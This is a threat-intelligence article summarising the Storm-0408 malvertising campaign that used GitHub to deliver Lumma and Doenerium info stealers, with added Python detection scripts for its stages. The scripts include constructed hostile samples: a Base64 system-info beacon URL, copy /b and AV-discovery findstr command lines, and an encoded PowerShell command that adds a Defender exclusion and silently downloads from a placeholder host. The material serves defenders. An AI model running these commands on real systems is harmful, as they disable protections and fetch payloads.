Malvertising Campaign Abuses GitHub to Distribute Info Stealers

PT FPT Metrodata Indonesia (FMI) is a joint venture between FPT IS and Metrodata Electronics, focusing on providing Cybersecurity-as-a-Service—including SOC, managed security, professional services, consulting, and threat intelligence—to support Indonesia’s rapidly growing digital economy. FMI is expanding into AI and cloud GPU services to deliver innovative protection and solutions for enterprises. Learn more at https://fmisec.com.
Summary
Microsoft published a blog detailing a large-scale malvertising campaign detected in December 2024 by Microsoft Threat Intelligence. The attack impacted nearly one million devices globally, targeting both consumer and enterprise users. It originated from illegal streaming websites with malvertising redirectors, leading victims to an intermediary site before redirecting them to GitHub, Discord, and Dropbox.
GitHub was the primary platform used to deliver initial access payloads, storing malware that deployed additional files and scripts. These files followed a modular, multi-stage approach to payload delivery, execution, and persistence. The malware collected system information and facilitated data exfiltration. This activity is tracked as Storm-0408, a group known for using phishing, SEO poisoning, and malvertising to distribute remote access and info-stealing malware. Microsoft analyzed the redirection chain and payloads used in the campaign.
Technical Details
Since early December 2024, multiple hosts downloaded first-stage payloads from malicious GitHub repositories after being redirected through a complex chain. The attack originated from illegal streaming websites that embedded malvertising redirectors within movie frames to generate revenue. These redirectors led users through multiple intermediary sites before ultimately directing them to GitHub, where malware was hosted.
The first-stage payload, hosted on GitHub, acted as a dropper for additional malicious files. The second-stage payload gathered system information, encoding it in Base64 and transmitting it via HTTP. It collected details like memory size, OS, screen resolution, and user paths. The third-stage payloads varied based on the second-stage drop, often enabling command and control (C2), further downloads, data exfiltration, and defense evasion. The full redirection chain involved multiple layers, with Microsoft researchers confirming malvertising redirectors were embedded in iframes on illegal streaming sites.

Once redirected to GitHub, the malware hosted there established an initial foothold on victims' devices, acting as a dropper for additional payloads. These payloads primarily included information stealers like Lumma Stealer and an updated version of Doenerium, which were designed to collect system and browser data. In some cases, NetSupport, a remote monitoring and management (RMM) tool, was also deployed.
Threat actors leveraged various scripts, including PowerShell, JavaScript, VBScript, and AutoIT, alongside living-off-the-land binaries (LOLBAS) such as PowerShell.exe, MSBuild.exe, and RegAsm.exe for command and control (C2) and data exfiltration. The attack followed a modular and multi-stage approach, with each stage deploying new payloads for system discovery, browser credential extraction, and execution of obfuscated scripts.
Persistence was achieved through registry modifications and adding shortcuts to the Windows Startup folder. The overall campaign involved multiple stages of malware deployment, data collection, and exfiltration to C2 servers. While not all payloads followed an identical sequence, most incidents followed this structured attack chain.

First-Stage Payload
In the first stage of the attack, a payload was delivered from GitHub to establish a foothold on the compromised device. As of mid-January 2025, these payloads were digitally signed with newly created certificates, though twelve such certificates were later revoked. The initial payloads dropped multiple legitimate files to aid later-stage malware execution. These files included archives storing second-stage payloads, Electron application files, multimedia and graphics-related DLLs, privilege escalation tools, and components from software installers like NSIS and .NET Framework.
Among the dropped files were app-64.7z (storing additional payloads), elevate.exe (used for privilege escalation), and various DLLs linked to multimedia and graphics applications. Some files were repurposed for persistence and stealthy execution.
Microsoft observed variations in second-stage payloads and different delivery techniques depending on the specific first-stage payload deployed on the infected device.
Second-Stage Payload
The second-stage payload focuses on system discovery and exfiltrating collected data to the command and control (C2) server. It gathers details such as memory size, graphics card specifications, screen resolution, operating system version, user paths, and a reference to its own file name.
To retrieve system information, it reads the ProductName value under the Windows registry key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion for the OS version. Additionally, it runs commands like echo %COMPUTERNAME% and echo %USERDOMAIN% to obtain the device and domain names. The collected system data is then Base64-encoded and sent as a query parameter in an HTTP request to a designated IP address for further exploitation.
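The second-stage beacon described above leaves a recognisable trace in proxy logs: a query parameter whose Base64 payload decodes to host-discovery fields. The following is an added detection example, not code from the original post; the URL, IP address and payload layout are constructed for illustration, and the marker list is an assumption about which fields the decoded data contains.

```python
import base64
import binascii
from urllib.parse import urlsplit, parse_qsl, quote

# Field names typical of the discovery data the second stage collects
# (assumed markers, chosen to match the report's description).
DISCOVERY_MARKERS = ("COMPUTERNAME", "USERDOMAIN", "ProductName",
                     "Windows", "resolution", "memory")

def decode_b64_loose(value: str):
    """Base64-decode a query value, tolerating missing padding and '+' that a
    URL parser turned into a space; return None if it is not valid Base64."""
    value = value.replace(" ", "+")
    padded = value + "=" * (-len(value) % 4)
    try:
        raw = base64.b64decode(padded, validate=True)
        return raw.decode("utf-8")
    except (binascii.Error, ValueError, UnicodeDecodeError):
        return None

def inspect_url(url: str):
    """Return (param_name, decoded_text, matched_markers) for the first query
    parameter whose Base64 payload carries at least two discovery markers,
    otherwise None."""
    for name, value in parse_qsl(urlsplit(url).query, keep_blank_values=True):
        text = decode_b64_loose(value)
        if text is None:
            continue
        hits = [m for m in DISCOVERY_MARKERS if m.lower() in text.lower()]
        if len(hits) >= 2:
            return name, text, hits
    return None

# Constructed sample log entries: a stage-2 style beacon to a documentation
# IP, and a benign search request. Neither value is taken from the report.
SAMPLE_PAYLOAD = ("COMPUTERNAME=DESKTOP-TEST;USERDOMAIN=WORKGROUP;"
                  "ProductName=Windows 10 Pro;memory=16GB;resolution=1920x1080")
SAMPLE_URL = ("http://203.0.113.10/index.php?id="
              + quote(base64.b64encode(SAMPLE_PAYLOAD.encode()).decode(), safe=""))
BENIGN_URL = "https://example.com/search?q=hello&page=2"

if __name__ == "__main__":
    print(inspect_url(SAMPLE_URL))   # ('id', '<decoded fields>', [...])
    print(inspect_url(BENIGN_URL))   # None
```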
Third-Stage Payload
The second-stage payload launches the third-stage malware through cmd.exe with the /c flag, which runs the command and then exits. The third-stage executable drops a .cmd file, which is then launched via cmd.exe. This script begins system discovery by running tasklist to list active processes and piping the output through findstr to check for security software, looking for antivirus products such as Webroot, Avast, and Bitdefender.
Additionally, the .cmd script concatenates multiple dropped files into a single file with a one-character name using cmd /c copy /b; this file is used in the next execution step. The third-stage payload then writes out an AutoIT v3 interpreter, renamed with a .com extension to evade detection. The .cmd script runs this renamed AutoIT interpreter against the one-character file, continuing the attack chain. Most second-stage payloads follow this structured multi-step approach, with some dropping multiple executables that adhere to the same execution process.
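The three command-line behaviours in this stage (copy /b into a one-character file, findstr for antivirus names, and a .com file launched against that one-character file) can be matched in process-creation telemetry. The following is an added detection example, not code from the original post; the sample command lines and piece names are constructed, and the regex rules are assumptions about how those commands appear in logs.

```python
import re

# Each rule: (tag, compiled regex), one per stage-3 behaviour described above.
RULES = [
    # copy /b concatenating pieces into a file whose name is one character
    ("copy_b_single_char_output",
     re.compile(r"\bcopy\s+/b\b.*\s([A-Za-z0-9])\s*$", re.I)),
    # findstr filtering (tasklist output) for the named security products
    ("av_discovery_findstr",
     re.compile(r"\bfindstr\b.*\b(webroot|avast|bitdefender)\b", re.I)),
    # a .com file run with a one-character argument: the renamed AutoIT v3
    # interpreter executed against the concatenated file
    ("renamed_autoit_com_launch",
     re.compile(r"(^|[\\\s])[A-Za-z0-9_]+\.com\s+[A-Za-z0-9]\s*$", re.I)),
]

def classify(cmdline: str):
    """Return the list of rule tags matched by one process command line."""
    return [tag for tag, rx in RULES if rx.search(cmdline)]

def score_chain(cmdlines):
    """Return the set of tags seen across a sequence of command lines; seeing
    all three on one host is the concatenate-then-AutoIT pattern."""
    seen = set()
    for cmdline in cmdlines:
        seen.update(classify(cmdline))
    return seen

# Constructed sample process-creation command lines (not from the report);
# the piece names and the one-character output name are illustrative.
SAMPLE_CHAIN = [
    r'cmd.exe /c copy /b Mature + Gently + Remedies + Closer u',
    r'tasklist',
    r'findstr /I "webroot avast bitdefender"',
    r'cmd.exe /c Alexandria.com u',
    r'notepad.exe C:\Users\test\notes.txt',
]

if __name__ == "__main__":
    for line in SAMPLE_CHAIN:
        print(classify(line), line)
    print(score_chain(SAMPLE_CHAIN))
```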
Fourth-Stage Payload
Fourth-stage .com files, such as Alexandria[.]com, Kills[.]com, and Briefly[.]com, perform persistence, process injection, remote debugging, and data exfiltration. Alexandria[.]com drops a .scr (AutoIT interpreter) and a .js file to maintain persistence using a Startup folder shortcut or scheduled tasks. It can initiate C2 connections, enable Chrome/Edge remote debugging, and create TCP listening sockets. Affiliated[.]com focuses on browser monitoring and remote debugging, making network connections to Telegram, Let’s Encrypt, and C2 domains while decrypting DPAPI-stored credentials. Briefly[.]com extends this functionality by capturing screenshots, exfiltrating data, and running PowerShell scripts while connecting to Pastebin and other C2 domains.
These files use LOLBAS techniques (e.g., RegAsm.exe) for C2 over TCP (ports 15647 or 9000), data exfiltration, keystroke monitoring, and DPAPI decryption. They access browser data (cookies, login data) and user files from OneDrive, Documents, and Downloads, adapting their attack based on system security settings.
Third-Stage PowerShell Analysis
Third-stage PowerShell scripts execute obfuscated commands to download additional payloads, establish persistence, and exfiltrate system data while avoiding detection. They use curl -silent and -ExecutionPolicy Bypass to remain stealthy. Some scripts collect system details, send them to C2 servers, and download NetSupport RAT for remote access. Others modify TLS settings, leverage MSBuild.exe for Chrome remote debugging, and scan for security tools or cryptocurrency wallets. Persistence is ensured through registry modifications and startup folder shortcuts.
Fourth-Stage PowerShell Analysis
The renamed AutoIT file drops an obfuscated PowerShell script that modifies Microsoft Defender exclusions to evade detection. The script executes Base64-encoded PowerShell commands to send web requests to 360[.]net and baidu[.]com before downloading a file from a malicious domain. The downloaded data is saved as a null.zip archive in the Temp directory for further execution.
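The PowerShell stages described in the two sections above combine an execution-policy bypass, Base64-encoded commands, a silent curl download, a Defender exclusion change, and a null.zip drop in Temp. The following is an added analysis example, not code from the original post: it decodes a -EncodedCommand argument (PowerShell expects Base64 of UTF-16LE text) and matches indicators against both the raw and decoded command. The sample command line, the use of Add-MpPreference as the exclusion mechanism, and the placeholder domain are assumptions.

```python
import base64
import re

# Indicators drawn from the behaviours described above.
PS_INDICATORS = {
    "execution_policy_bypass": re.compile(r"-ex\w*\s+bypass", re.I),
    "defender_exclusion_added": re.compile(r"Add-MpPreference\s+-Exclusion\w*", re.I),
    "silent_curl_download": re.compile(r"\bcurl(\.exe)?\b.*-s(ilent)?\b", re.I),
    "null_zip_in_temp": re.compile(r"(temp|tmp)\\null\.zip", re.I),
}

def decode_encoded_command(cmdline: str):
    """Return the script carried by -e/-enc/-EncodedCommand, or None if the
    argument is absent or is not valid Base64-wrapped UTF-16LE."""
    m = re.search(r"-e(?:nc|ncodedcommand)?\s+([A-Za-z0-9+/=]+)", cmdline, re.I)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None

def analyse_powershell(cmdline: str):
    """Return the sorted indicator tags found in the raw command line and,
    when present, in its decoded -EncodedCommand script."""
    decoded = decode_encoded_command(cmdline) or ""
    views = cmdline + "\n" + decoded
    return sorted(tag for tag, rx in PS_INDICATORS.items() if rx.search(views))

def encode_for_powershell(script: str) -> str:
    """Build an -EncodedCommand value the way PowerShell expects it (UTF-16LE)."""
    return base64.b64encode(script.encode("utf-16-le")).decode()

# Constructed sample: an inner script that excludes Temp from Defender and
# fetches null.zip from a placeholder domain. Nothing here is from the report.
INNER_SCRIPT = ("Add-MpPreference -ExclusionPath $env:TEMP; "
                "curl.exe -silent http://malicious.example/p -o $env:TEMP\\null.zip")
SAMPLE_CMD = ("powershell.exe -ExecutionPolicy Bypass -NoProfile -EncodedCommand "
              + encode_for_powershell(INNER_SCRIPT))
BENIGN_CMD = "powershell.exe -NoProfile -Command Get-Date"

if __name__ == "__main__":
    print(decode_encoded_command(SAMPLE_CMD))
    print(analyse_powershell(SAMPLE_CMD))   # four indicator tags
    print(analyse_powershell(BENIGN_CMD))   # []
```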
Conclusion
The attack campaign attributed to Storm-0408 follows a multi-stage infection chain, leveraging AutoIT scripts, PowerShell commands, and LOLBins to establish persistence, evade detection, and exfiltrate sensitive data. By modifying Microsoft Defender exclusions, executing obfuscated scripts, and deploying renamed executables, the attackers ensure stealth and prolonged system access. The use of remote debugging, credential theft, and network connections to C2 servers enables extensive post-exploitation activities. The complexity and adaptability of the techniques highlight Storm-0408's sophistication and ability to bypass security defenses.